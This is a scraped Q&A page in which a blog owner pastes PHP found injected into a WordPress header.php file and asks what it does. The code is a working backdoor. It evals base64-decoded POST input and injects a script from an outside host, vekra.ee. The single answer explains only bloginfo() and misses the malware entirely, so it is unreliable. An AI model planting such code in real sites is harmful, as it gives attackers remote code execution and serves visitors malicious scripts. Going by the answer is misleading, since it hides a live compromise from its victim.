Sign Up

Sign Up to our social questions and Answers Engine to ask questions, answer people’s questions, and connect with other people.

Have an account? Sign In

Have an account? Sign In Now

Sign In

Login to our social questions & Answers Engine to ask questions answer people’s questions & connect with other people.

Sign Up Here

Forgot Password?

Don't have account, Sign Up Here

Forgot Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Have an account? Sign In Now

You must login to ask a question.

Forgot Password?

Need An Account, Sign Up Here

Please briefly explain why you feel this question should be reported.

Please briefly explain why you feel this answer should be reported.

Please briefly explain why you feel this user should be reported.

Sign InSign Up

The Archive Base

The Archive Base Logo The Archive Base Logo

The Archive Base Navigation

  • SEARCH
  • Home
  • About Us
  • Blog
  • Contact Us
Search
Ask A Question

Mobile menu

Close
Ask a Question
  • Home
  • Add group
  • Groups page
  • Feed
  • User Profile
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Buy Points
  • Users
  • Help
  • Buy Theme
  • SEARCH
Home/ Questions/Q 6952107
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Editorial Team
Asked: May 27, 20262026-05-27T14:18:20+00:00 2026-05-27T14:18:20+00:00

Possible Duplicate: Got Hacked – Anyone know what this PHP Code Does? I just

  • 0

Possible Duplicate:
Got Hacked – Anyone know what this PHP Code Does?

I just found this on one of my blogs header.php file, I will like to know if somebody can say what is that ? (scroll to the right so see all the code)

Thanks

<meta http-equiv="Content-Type" content="<?php                                                global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
 bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />

What I will like to know is what does this code. (scroll to the right so see all the code)

Thanks!
Double douplicate:

Here: Got Hacked – Anyone know what this PHP Code Does?
and
Here: What this php script will do ? is it Malicious php Code?

Now tis is a new practice affecting wordpress ???

  • 1 1 Answer
  • 0 Views
  • 0 Followers
  • 0
Share
  • Facebook
  • Report

Leave an answer
Cancel reply

You must login to add an answer.

Forgot Password?

Need An Account, Sign Up Here

1 Answer

  • Voted
  • Oldest
  • Recent
  • Random
  1. Editorial Team
    Editorial Team
    2026-05-27T14:18:21+00:00Added an answer on May 27, 2026 at 2:18 pm

    From the wordpress function reference for bloginfo:

    Displays information about your blog, mostly gathered from the
    information you supply in your User Profile and General Options from
    the WordPress Administration panels (Settings → General). It can be
    used anywhere within a page template. This always prints a result to
    the browser. If you need the values for use in PHP, use

    In this special case:
    Basically it fetches the content type (html_type) and the charset from wordpress and puts it into the HTML header of the page it creates.

    • 0
    • Reply
    • Share
      Share
      • Share on Facebook
      • Share on Twitter
      • Share on LinkedIn
      • Share on WhatsApp
      • Report

Sidebar

Related Questions

Possible Duplicate: PHP: the ultimate clean/secure function I have got this code when I
Possible Duplicate: Why does PHP echo'd text lose it's formatting? I got strange problem.
Possible Duplicate: curly braces in string Just came across this piece of code and
Possible Duplicate: Difference between WIN32 and other c string I got this code inside
Possible Duplicate: class has virtual functions and accessible non-virtual destructor I got this code
Possible Duplicate: Getting Started with PHP Extension-Development Has anyone got some resources on how
Possible Duplicate: Convert some code from C++ to C I've got some code that
Possible Duplicate: What are Extension Methods? Hi, After googlin got to know a bit
Possible Duplicate: replace multiple placeholders with php? I've got a .txt-file working as a
Possible Duplicate: String equality vs equality of location I just got my first assessed

Explore

  • Home
  • Add group
  • Groups page
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Users
  • Help
  • SEARCH

Footer

© 2021 The Archive Base. All Rights Reserved
With Love by The Archive Base

Insert/edit link

Enter the destination URL

Or link to existing content

    No search term specified. Showing recent items. Search or use up and down arrow keys to select an item.